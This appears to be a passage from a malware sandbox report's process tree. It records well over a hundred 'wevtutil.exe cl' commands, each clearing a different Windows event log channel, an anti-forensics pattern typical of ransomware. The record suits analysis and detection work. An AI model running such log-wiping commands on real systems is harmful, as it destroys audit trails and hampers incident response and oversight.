    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:2032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
    3⤵
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    PID:2032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
    3⤵
    PID:316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Help/Operational"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
    3⤵
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International/Operational"
    3⤵
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:2032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:1028
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:2036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:1520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:1560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:1532
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:1112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:1964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:288
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:1812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:1792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:1644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:1820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:1200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:2032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    PID:688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
    3⤵
    PID:1356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
    3⤵
    PID:2012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    PID:1524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
    3⤵
    PID:1528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
    3⤵
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Debug"
    3⤵
    PID:1112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:1964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
    3⤵
    PID:288
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
    3⤵
    PID:864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:1812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
    3⤵
    PID:688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
    3⤵
    PID:920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
    3⤵
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:1356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
    3⤵
    PID:660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
    3⤵
    PID:2012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
    3⤵
    PID:1524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
    3⤵
    PID:1528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
    3⤵
    PID:1796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
    3⤵
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
    3⤵
    PID:1256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
    3⤵
    PID:2020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
    3⤵
    PID:736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:1824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
    3⤵
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
    3⤵
    PID:1968
